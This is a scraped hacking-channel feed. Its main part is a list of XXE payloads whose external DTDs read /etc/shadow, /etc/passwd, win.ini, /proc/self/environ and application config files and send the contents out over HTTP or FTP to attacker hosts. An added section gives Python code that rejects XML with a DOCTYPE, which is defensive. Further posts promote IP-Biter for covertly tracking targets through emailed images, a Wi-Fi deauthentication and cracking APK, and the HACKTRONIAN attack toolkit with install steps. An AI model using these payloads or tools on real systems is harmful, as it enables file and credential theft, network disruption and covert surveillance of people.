UNDERCODE SECURITY
🦑WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑XXE PAYLOADS LIST :


--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

## External dtd: ##

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

## External dtd: ##

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------

<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>
## External dtd: ##

<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;


-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

## External dtd: ##

<!ENTITY all "%start;%stuff;%end;">

------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

## External dtd: ##

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

-------------------------^ you might need to encode this % (depends on your target) as: &#x25;

--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>


## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>


---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

source https://gist.github.com/staaldraad/01415b990939494879b4
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
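
Added example, not part of the original post or the linked gist: every payload in the list above depends on a DOCTYPE declaration, so a parser front end that refuses any document carrying one rejects them before a single entity is declared. The sketch uses Python's standard expat bindings; the names parse_untrusted, ForbiddenXML and inner_xml and the host collector.example.invalid are assumptions made for the illustration, and the sample documents are constructed.

```python
# Added example: refuse untrusted XML that carries a DTD (names are hypothetical).
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class ForbiddenXML(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _on_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this on reaching the DOCTYPE, before its entities are declared.
    raise ForbiddenXML(f"DOCTYPE {name!r} not allowed (system id: {system_id!r})")


def parse_untrusted(data: bytes) -> ET.Element:
    """Pre-scan with expat, rejecting any DTD, then build the element tree."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _on_doctype
    scanner.Parse(data, True)  # raises ForbiddenXML or expat.ExpatError
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted(data)
    except ForbiddenXML:
        return True
    return False


# Constructed samples; collector.example.invalid is a placeholder host.
BENIGN = b"<r>hello</r>"
WITH_DTD = (b'<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY >'
            b'<!ENTITY sp SYSTEM "http://collector.example.invalid/test.txt">]>'
            b"<r>&sp;</r>")
WRAPPED = (b"<env><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "
           b'"http://collector.example.invalid/"> %dtd;]><xxx/>]]></foo></env>')


def inner_xml(data: bytes) -> bytes:
    """Text of <foo>, which an application might hand to a second parser."""
    return parse_untrusted(data).find("foo").text.encode()


if __name__ == "__main__":
    print(is_rejected(BENIGN), is_rejected(WITH_DTD))
    print(is_rejected(WRAPPED), is_rejected(inner_xml(WRAPPED)))
```

The CDATA-wrapped form passes the outer check because its DOCTYPE is only character data at that level; the same check has to run again wherever the inner text is handed to a parser.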
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME IP HACKING-TRACKING :

F E A T U R E S :

Highly configurable tracking image generation
Tracking links generation
Tracking hidden and not recognizable from the target's point of view
Integrated Dashboard
Self-tracking prevention
Possibility to stop and start the tracking at any time
Possibility to hide the Dashboard and protect its access with a password
Live tracking reports from the Dashboard
Tracking reports live delivered to a configurable mail address
Different IP analysis services
User-Agent analysis service
Integrated URL shortening service
AllInOne PHP file
No need for a Database
Open Source

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) clone https://github.com/damianofalcioni/IP-Biter

Deploy IP-Biter

2) Copy ipb.php in your PHP server and optionally create a .htaccess file as described in the next security notes

3) Some configurable parameters are available in the first uncommented PHP lines of the ipb.php file, identified by the comment "START CONFIGURATION SECTION"

4) Access the Dashboard

5) Access the dashboard through ipb.php?op=$dashboardPage (or through ipb.php if $dashboardPage=='')
If $dashboardPageSecret!='' then a login page will appear asking for the $dashboardPageSecret value

6) Create a new configuration

7) When the dashboard is opened without parameters, a new configuration is created

8) Another empty new configuration can be generated by clicking the "New" button

9) Configure the tracking image and the advanced setting if needed

10) It is possible to leave the original image url empty. In this case an empty image will be used.

12) Add tracking links if needed

13) It is possible to leave the original link empty. In this case the link will generate a 404 page.

14) Save the configuration

15) Distribute the generated image or the links to start the tracking

16) You can click the copy button and paste into an HTML rich email editor like Gmail

NOTE: If you try to open the generated image or links while the dashboard page is open and loaded in the same browser, your request will not be tracked (self-tracking prevention feature)

17) Load an existing configuration

18) When the dashboard is opened with the parameter "uuid", the associated configuration is loaded

19) Another configuration can be loaded by pasting the "Track UUID" into the related dashboard field and clicking the "Load" button

20) The reports will be automatically visualized in the "Tracking Reports" section of the dashboard

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑APK 2020 hacking update all in one :

Information Gathering
View a list of access points and stations (clients) around you (even hidden ones)
View the activity of a specific network (by measuring beacons and data packets) and its clients
Statistics about access points and stations
See the manufacturer of a device (AP or station) from the OUI database
See the signal power of devices and filter the ones that are closer to you
Save captured packets in .cap file
Attacks
Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)
Deauthenticate a specific client from the network it's connected to
MDK3 Beacon Flooding with custom options and SSID list
MDK3 Authentication DoS for a specific network or to every nearby AP
Capture a WPA handshake or gather IVs to crack a WEP network
Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
Other
Leave the app running in the background, optionally with a notification
Copy commands or MAC addresses to clipboard
Includes the required tools, no need for manual installation
Includes the Nexmon driver, required library and management utility for BCM4339 and BCM4358 devices
Set commands to enable and disable monitor mode automatically
Crack .cap files with a custom wordlist
Create custom actions and run them on an access point or a client easily
Sort and filter Access Points and Stations with many parameters
Export all gathered information to a file
Add a persistent alias to a device (by MAC) for easier identification

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

DOWNLOAD THIS APK

https://github.com/chrisk44/Hijacker/releases/download/v1.5-beta.12/Hijacker-release-v1.5-beta.12.apk

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 I want to set my Slackware Linux as a server, so that others can connect to my Linux host via modem dial-up. What should I do? Especially how to make my modem answer the dial?

1) Add this line in /etc/inittab:
d1:345:respawn:/sbin/agetty -mt60 38400,19200,9600,2400,1200 ttyS1
(assuming your modem is on the second serial port)
Note that Red Hat's mingetty cannot be used for this purpose; you can
download mgetty from freesoft.cei.gov.cn and use that instead.

2) If your modem has a switch, you can set it to answer calls. If there is no switch,
check its manual to find the AT command that does this (I do not have the modem manual)
and set that command up in /etc/rc.d/rc.local.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from WEB UNDERCODE - PRIVATE
SQLite3 Injection.pdf
98.7 KB
A few months ago I found an SQL injection vulnerability in an enterprisey webapp's help system. Turns out this was stored in a separate database - in SQLite. I had a Google around and could find very little information about exploiting SQLI with SQLite as the backend.. so I went on a hunt, and found some neat tricks
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEW UPDATE (last month) -ALL IN ONE :

HACKTRONIAN Menu :
  Information Gathering
  Password Attacks
  Wireless Testing
  Exploitation Tools
  Sniffing & Spoofing
  Web Hacking
  Private Web Hacking
  Post Exploitation
  Install The HACKTRONIAN

Information Gathering:
  Nmap
  Setoolkit
  Port Scanning
  Host To IP
  wordpress user
  CMS scanner
  XSStrike
  Dork - Google Dorks Passive Vulnerability Auditor
  Scan A server's Users
  Crips

Password Attacks:
  Cupp
  Ncrack

Wireless Testing:
  reaver
  pixiewps
  Fluxion

Exploitation Tools:
  ATSCAN
  sqlmap
  Shellnoob
  commix
  FTP Auto Bypass
  jboss-autopwn

Sniffing & Spoofing:
  Setoolkit
  SSLtrip
  pyPISHER
  SMTP Mailer

Web Hacking:
  Drupal Hacking
  Inurlbr
  Wordpress & Joomla Scanner
  Gravity Form Scanner
  File Upload Checker
  Wordpress Exploit Scanner
  Wordpress Plugins Scanner
  Shell and Directory Finder
  Joomla! 1.5 - 3.4.5 remote code execution
  Vbulletin 5.X remote code execution
  BruteX - Automatically brute force all services running on a target
  Arachni - Web Application Security Scanner Framework

Private Web Hacking:
  Get all websites
  Get joomla websites
  Get wordpress websites
  Control Panel Finder
  Zip Files Finder
  Upload File Finder
  Get server users
  SQli Scanner
  Ports Scan (range of ports)
  ports Scan (common ports)
  Get server Info
  Bypass Cloudflare

Post Exploitation:
  Shell Checker
  POET
  Weeman

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Installation in Linux :
This Tool Must Run As ROOT !!!

1) git clone https://github.com/thehackingsage/hacktronian.git

2) cd hacktronian

3) chmod +x install.sh

4) ./install.sh

That's it. You can run the tool by typing hacktronian

Installation in Android :

1) Open Termux

2) pkg install git

3) pkg install python

4) git clone https://github.com/thehackingsage/hacktronian.git

5) cd hacktronian

6) chmod +x hacktronian.py

7) python2 hacktronian.py

✅git 2020
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁